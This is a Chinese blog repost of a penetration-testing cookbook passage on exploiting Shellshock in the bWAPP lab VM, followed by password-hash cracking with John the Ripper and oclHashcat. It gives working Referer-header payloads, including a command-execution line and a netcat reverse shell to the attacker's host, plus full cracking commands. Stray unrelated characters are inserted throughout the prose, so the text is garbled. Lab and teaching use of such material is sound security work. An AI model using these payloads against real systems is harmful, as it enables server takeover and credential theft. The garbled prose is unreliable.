Shellshock 和我們滲透測(cè)試者有關(guān)系砂客,因?yàn)殚_(kāi)發(fā)者有時(shí)候允許我們?cè)?PHP 或 CGI 腳本中調(diào)用系統(tǒng)命令 – 這些腳本可以利用系統(tǒng)環(huán)境變量泥张。

這個(gè)秘籍中,我們會(huì)在 Bee-box 漏洞虛擬機(jī)中利用 Shellshock 漏洞來(lái)獲得服務(wù)器的命令執(zhí)行權(quán)鞠值。

操作步驟

  • 1.登錄http://192.168.56.103/bWAPP/媚创。

  • 2.在Choose your bug下拉框中選擇Shellshock Vulnerability (CGI),之后點(diǎn)擊Hack彤恶。


    在文本中钞钙,我們看到了一些有趣的東西鳄橘;Current user: www-data。這可能意味著頁(yè)面使用系統(tǒng)調(diào)用來(lái)獲得用戶名芒炼。它給了我們提示:Attack the referrer瘫怜。

  • 3.讓我們看看背后有什么東西,使用 BurpSuite 來(lái)記錄請(qǐng)求并重復(fù)步驟 2本刽。

  • 4.讓我們查看代理的歷史:


    我們可以看到鲸湃,有個(gè)iframe調(diào)用了 shell 腳本:./cgi-bin/shellshock.sh,這可能存在 Shellshock 漏洞子寓。

  • 5.讓我們跟隨提示并嘗試攻擊shellshock.sh暗挑。所以我們首先需要配置 BurpSuite 來(lái)攔截服務(wù)器的響應(yīng),訪問(wèn)Proxy標(biāo)簽頁(yè)的Options斜友,并選中Intercept responses based on the following rules的選擇框炸裆。

  • 6.現(xiàn)在,讓 BurpSuite 攔截和重新加載shellshock.php蝙寨。

  • 7.在 BurpSuite 中晒衩,點(diǎn)擊Forward直到得到了/bWAPP/cgi-bin/ shellshock.sh請(qǐng)求嗤瞎,之后將Referer替換為:

1  () { :;}; echo "Vulnerable:"
  • 8.再次點(diǎn)擊Forward墙歪,在.ttf文件的請(qǐng)求中,我們應(yīng)該能得到shellshcok.sh的響應(yīng)贝奇,像這樣:


    現(xiàn)在響應(yīng)多了一個(gè)協(xié)議頭參數(shù)虹菲,叫做Vulnerable。這是因?yàn)樗鼘?code>echo命令的輸出集成到 HTTP 協(xié)議頭中掉瞳,所以我們可以進(jìn)一步利用它毕源。

  • 9.現(xiàn)在使用下列命令重復(fù)這個(gè)過(guò)程:

1  () { :;}; echo "Vulnerable:" $(/bin/sh -c "/sbin/ifconfig")
  • 10.能夠在遠(yuǎn)程服務(wù)器上執(zhí)行命令,對(duì)于滲透測(cè)試來(lái)說(shuō)是個(gè)巨大的優(yōu)勢(shì)陕习,下一步自然是獲得遠(yuǎn)程 shell霎褐。在 Kali 中打開(kāi)終端,監(jiān)聽(tīng)網(wǎng)絡(luò)端口该镣,像這樣:
1  nc -vlp 12345
  • 11.現(xiàn)在訪問(wèn) BurpSuite 的代理歷史冻璃,選擇任何shellshock.sh的請(qǐng)求,右擊它并發(fā)送到 Repeater损合,像這樣:

  • 12.在 Repeater 中省艳,修改 Referer 的值為:

1  () { :;}; echo "Vulnerable:" $(/bin/sh -c "nc -e /bin/bash 192.168.56.1 12345")

這里,192.168.56.1 是我們 Kali 主機(jī)的地址嫁审。

  • 13.點(diǎn)擊Go跋炕。

  • 14.如果我們檢查我們的終端,我們可以看到連接已建立律适,執(zhí)行一些命令來(lái)檢查我們是否得到了遠(yuǎn)程 shell辐烂。


工作原理

在第一步中遏插,我們發(fā)現(xiàn)了 shell 腳本的調(diào)用。因?yàn)樗梢员?shell 解釋器運(yùn)行纠修,它可能是漏洞版本的 bash涩堤。為了驗(yàn)證,我們執(zhí)行了下列測(cè)試:

1  () { :;}; echo "Vulnerable:" 

第一個(gè)部分() { :;};是個(gè)空函數(shù)分瘾,因?yàn)?bash 可以將函數(shù)儲(chǔ)存為環(huán)境變量胎围,這個(gè)是漏洞的核心。在函數(shù)結(jié)束之后德召,解析器會(huì)繼續(xù)解釋(并執(zhí)行)命令白魂,這允許我們執(zhí)行第二個(gè)部分echo "Vulnerable:,這是簡(jiǎn)單返回輸入的命令上岗。

Web 服務(wù)器中存在漏洞福荸,因?yàn)?CGI 事先將請(qǐng)求的所有部分映射為環(huán)境變量,所以這個(gè)攻擊通過(guò)User-Agent或者Accept-Language也能工作肴掷。

一旦我們知道了服務(wù)器存在漏洞敬锐,我們鍵入測(cè)試命令ifconfig并建立反向 shell

反向 shell 是一種遠(yuǎn)程 shell呆瞻,它的特點(diǎn)是由受害者主機(jī)初始化台夺,攻擊者監(jiān)聽(tīng)連接,而不是服務(wù)器在綁定連接中等待客戶端的連接痴脾。

7.8 使用 John the Ripper 和字典來(lái)破解密碼哈希

在上一個(gè)秘籍颤介,以及第六章中,我們從數(shù)據(jù)庫(kù)中提取了密碼哈希赞赖。在執(zhí)行滲透測(cè)試的時(shí)候滚朵,有時(shí)候這是唯一的用于發(fā)現(xiàn)密碼的方式。為了發(fā)現(xiàn)真實(shí)的密碼前域,我們需要破譯它們辕近。由于哈希由不可逆的函數(shù)生成,我們沒(méi)有辦法直接解密密碼匿垄。所以使用慢速的方法列疗,例如暴力破解和字典攻擊就很有必要锉屈。

這個(gè)秘籍中,我們會(huì)使用 John the Ripper(JTR 或 John),最流行的密碼破解器笛辟,從第六章“逐步執(zhí)行基本的 SQL注入”秘籍中提取的哈希中恢復(fù)密碼嬉愧。

操作步驟

  • 1.雖然 JTR 對(duì)接受的輸入非常靈活沙庐,為了防止錯(cuò)誤解釋狡蝶,我們首先需要以特定格式設(shè)置用戶名和密碼哈希。創(chuàng)建叫做hashes_6_7.txt的文本文件痒蓬,每行包含一個(gè)名稱和一個(gè)哈希童擎,以冒號(hào)分隔(username:hash)滴劲,像這樣:

  • 2.一旦我們擁有了這個(gè)文件,我們可以打開(kāi)終端并執(zhí)行下列命令:

1  john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes_6_7.txt

我們使用 Kali 預(yù)置的單詞列表之一顾复。我們可以看到單詞列表中六個(gè)密碼發(fā)現(xiàn)了五個(gè)班挖,我們也能發(fā)現(xiàn),John 每秒能比較 10,336,000 次(10,336 KC/s)芯砸。

  • 3.John 也有選項(xiàng)來(lái)應(yīng)用修改器規(guī)則 – 添加前后綴萧芙,修改大小寫(xiě),以及在每個(gè)密碼上使用 leetspeak假丧。讓我們?cè)谌匀晃雌平獾拿艽a上嘗試它們:
1  john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes_6_7.txt –rules

我們可以看到這個(gè)規(guī)則生效了双揪,我們得到了最后一個(gè)密碼。

工作原理

John(以及任何離線密碼破解器)的工作方式是計(jì)算列表(或所生成的)單詞的哈希包帚,并將它們與需要被破解的哈希對(duì)比渔期,當(dāng)存在匹配時(shí),它就假設(shè)密碼找到了渴邦。

第一個(gè)命令使用--wordlist選項(xiàng)告訴 John 要使用什么單詞疯趟。如果忽略了它,它會(huì)生成自己的列表來(lái)執(zhí)行爆破攻擊谋梭。--format選項(xiàng)告訴我們要使用什么算法來(lái)生成哈希信峻,如果這個(gè)選項(xiàng)被忽略,John 會(huì)猜測(cè)它章蚣,通常帶有不錯(cuò)的結(jié)果站欺。最后姨夹,我們將包含想要破解的哈希的文件傳入纤垂。

我們可以通過(guò)使用--rules選項(xiàng)來(lái)增加找到密碼的機(jī)會(huì),因?yàn)樵趪L試創(chuàng)建更強(qiáng)的密碼來(lái)破解的時(shí)候磷账,它會(huì)使用人們對(duì)單詞所做的常用修改峭沦。例如,對(duì)于password逃糟,John也會(huì)嘗試下面的東西:

  • Password
  • PASSWORD
  • password123
  • Pa$$w0rd

7.9 使用 oclHashcat/cudaHashcat 爆破密碼哈希

最近吼鱼,顯卡的發(fā)展取得了巨大突破,這種芯片中含有成百上千個(gè)處理器绰咽,它們都并行工作菇肃。這里,當(dāng)應(yīng)用在密碼破解上是取募,這意味著琐谤,如果單個(gè)處理每秒可以計(jì)算一萬(wàn)個(gè)哈希,一個(gè)帶有上千內(nèi)核的 GPU 就能夠計(jì)算一千萬(wàn)個(gè)玩敏。這可以將破解時(shí)間降至一千分之一斗忌。

現(xiàn)在我們使用 Hashcat 的 GPU 版本來(lái)爆破密碼质礼。如果你在 N 卡的電腦上安裝的 Kali,你需要 cudeHashcat织阳。如果它安裝在 A 卡的電腦上眶蕉,則需要 oclHashcat。如果你在虛擬機(jī)上安裝 kali唧躲,GPU 破解可能不工作造挽,但是你始終可以在你的主機(jī)上安裝它,Windows 和 Linux 上都有它的版本弄痹。

這個(gè)秘籍中刽宪,我們會(huì)使用 oclHashcat,它和 cudaHashcat 的命令沒(méi)有區(qū)別界酒,雖然 A 卡對(duì)于密碼破解更加高效圣拄。

準(zhǔn)備

我們需要確保你正確安裝了顯卡驅(qū)動(dòng),oclHashcat 也兼容它們毁欣,所以你需要做這些事情:

  • 1.單獨(dú)運(yùn)行 oclHashcat庇谆,如果出現(xiàn)問(wèn)題它會(huì)告訴你。
1  oclhashcat
  • 2.測(cè)試它在跑分模式中支持的每種算法的哈希率凭疮。
1  oclhashcat --benchmark 
  • 3.取決于你的安裝饭耳,oclHahcat 可能需要在你的特定顯卡上強(qiáng)行工作:
1  oclhashcat --benchmark --force

我們會(huì)使用上一個(gè)秘籍的相同哈希文件。

Kali 默認(rèn)安裝的 oclHashcat 上有一些問(wèn)題执解,所以如果你在運(yùn)行 oclHashcat 的時(shí)候出現(xiàn)了問(wèn)題寞肖,你始終可以從官網(wǎng)上下載最新版本,并從你解壓的地方直接運(yùn)行(http://hashcat.net/ oclhashcat/)衰腌。

操作步驟

  • 1.我們首先破解單個(gè)哈希新蟆,讓我們?cè)囋?code>admin的哈希:
1  oclhashcat -m 0 -a 3 21232f297a57a5a743894a0e4a801fc3

你可以看到,我們能夠直接從命令行中設(shè)置哈希右蕊,它會(huì)在一秒之內(nèi)破解出來(lái)琼稻。

  • 2.現(xiàn)在,為了破解整個(gè)文件饶囚,我們需要去掉用戶名帕翻,只保留哈希,像這樣:



    我們創(chuàng)建了只包含哈希的新文件萝风。

  • 3.為了破解文件中的哈希嘀掸,我們只需要在上一條命令中將哈希替換為文件名稱。

1  oclhashcat -m 0 -a 3 hashes_only_6_7.txt

你可以看到规惰,它在三分鐘之內(nèi)涵蓋了一到七個(gè)字符的所有組合(每秒破解 6.885 億個(gè)哈希)睬塌。并且它需要花費(fèi)多于兩個(gè)小時(shí)來(lái)測(cè)試八個(gè)字符的所有組合。這對(duì)于爆破來(lái)說(shuō)十分有效。

工作原理

在這個(gè)秘籍中衫仑,我們用于執(zhí)行oclHahcat的參數(shù)定義了要使用的哈希算法:-m 0告訴程序使用 MD5 來(lái)計(jì)算所生成單詞的哈希梨与,以及攻擊類型,-a 3的意思是我們打算使用純爆破攻擊文狱,并嘗試所有可能的字符組合粥鞋,直到發(fā)現(xiàn)了密碼。最后瞄崇,我們?cè)诘谝环N情況中添加了我們打算破解的哈希呻粹,第二種情況中我們添加了包含哈希集合的文件。

oclHahcat 也可以使用字典文件來(lái)執(zhí)行混合攻擊(爆破加上字典)來(lái)定義要測(cè)試哪個(gè)字符集苏研,并將結(jié)果保存到指定文件中(/usr/share/oclhashcat/oclHashcat.pot)等浊。他也可以對(duì)單詞應(yīng)用規(guī)則,并使用統(tǒng)計(jì)模型(馬爾科夫鏈)來(lái)增加破解效率摹蘑。使用--help命令來(lái)查看所有選項(xiàng)筹燕,像這樣:

1  oclhashcat --help

版權(quán)聲明:本文轉(zhuǎn)載自wizardforcel的專欄,如有侵權(quán)衅鹿,請(qǐng)與本人聯(lián)系撒踪。
專欄鏈接:http://blog.csdn.net/wizardforcel

原文鏈接:http://blog.csdn.net/wizardforcel/article/details/52858046

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市大渤,隨后出現(xiàn)的幾起案子制妄,更是在濱河造成了極大的恐慌,老刑警劉巖泵三,帶你破解...
    沈念sama閱讀 217,277評(píng)論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件耕捞,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡烫幕,警方通過(guò)查閱死者的電腦和手機(jī)俺抽,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,689評(píng)論 3 393
  • 文/潘曉璐 我一進(jìn)店門(mén),熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)纬霞,“玉大人凌埂,你說(shuō)我怎么就攤上這事∈撸” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 163,624評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵埃疫,是天一觀的道長(zhǎng)伏恐。 經(jīng)常有香客問(wèn)我,道長(zhǎng)栓霜,這世上最難降的妖魔是什么翠桦? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,356評(píng)論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮,結(jié)果婚禮上销凑,老公的妹妹穿的比我還像新娘丛晌。我一直安慰自己,他們只是感情好斗幼,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,402評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布澎蛛。 她就那樣靜靜地躺著,像睡著了一般蜕窿。 火紅的嫁衣襯著肌膚如雪谋逻。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 51,292評(píng)論 1 301
  • 那天桐经,我揣著相機(jī)與錄音毁兆,去河邊找鬼。 笑死阴挣,一個(gè)胖子當(dāng)著我的面吹牛气堕,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播畔咧,決...
    沈念sama閱讀 40,135評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼送巡,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了盒卸?” 一聲冷哼從身側(cè)響起骗爆,我...
    開(kāi)封第一講書(shū)人閱讀 38,992評(píng)論 0 275
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎蔽介,沒(méi)想到半個(gè)月后摘投,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,429評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡虹蓄,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,636評(píng)論 3 334
  • 正文 我和宋清朗相戀三年犀呼,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片薇组。...
    茶點(diǎn)故事閱讀 39,785評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡外臂,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出律胀,到底是詐尸還是另有隱情宋光,我是刑警寧澤,帶...
    沈念sama閱讀 35,492評(píng)論 5 345
  • 正文 年R本政府宣布炭菌,位于F島的核電站罪佳,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏黑低。R本人自食惡果不足惜赘艳,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,092評(píng)論 3 328
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧蕾管,春花似錦枷踏、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,723評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至婴梧,卻和暖如春下梢,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背塞蹭。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,858評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工孽江, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人番电。 一個(gè)月前我還...
    沈念sama閱讀 47,891評(píng)論 2 370
  • 正文 我出身青樓岗屏,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親漱办。 傳聞我的和親對(duì)象是個(gè)殘疾皇子这刷,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,713評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容